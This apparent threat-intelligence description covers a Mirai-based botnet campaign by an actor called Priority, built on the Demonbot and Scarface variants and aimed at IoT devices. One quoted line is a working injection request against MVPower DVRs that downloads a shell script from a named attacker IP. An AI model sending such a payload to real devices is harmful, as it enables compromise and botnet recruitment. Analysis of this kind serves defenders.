Scarface Botnet Description
When a malware threat gets its source code either leaked or released to the public by the developers themselves, it allows even not-so-experienced threat actors to take it, make adjustments to suit their needs better and unleash it in the wild. This exact behavior has been detected multiple times since the code of the infamous Mirai Botnet was published on hacker forums back in 2016.
A threat actor identifying itself as Priority is behind an attack campaign involving two different Mirai variants. The first payload it deployed was based on the Demonbot Mirai variant and it focused on Hadoop attacks specifically. The second payload adopted later in the campaign is far more advanced, and it is based on the Mirai variant developed by Scarface. Scarface is a known malware developer that took the Mirai code and attempted to make it accessible for novice hackers more easily while also tailoring the threat to infect Internet of Things (IoT) devices.
The Priority campaign focuses on scanning for several ports - 500, 5501, 5502, 5050, and 60001, and attacking them with a single command with the 'GET /shell?cd%20/tmp;%20wget%20http://45(.)13.58.4/TPJ.sh; command. According to the infosec analysts that analyzed the Priority campaign, the attacker appears to have a specific goal in mind because it targets the 60001 port primarily while the other four serve more as a distraction than anything else. In addition, they determined that Priority must be rather inexperienced, evidenced by the fact that only a single vulnerability was exploited as a compromise vector - MVPower DVR Shell Unauthenticated Command Execution, instead of the usual amount of between 3 and 7 exploits found in other similar threats.
All of the initial attacks were launched by a single IP address hosted on a Virtual Private Server (VPS) provided by Digital Ocean. Hackers often resort to VPS due to the flexibility they provide in setting up a server quickly and then purging it as fast equally.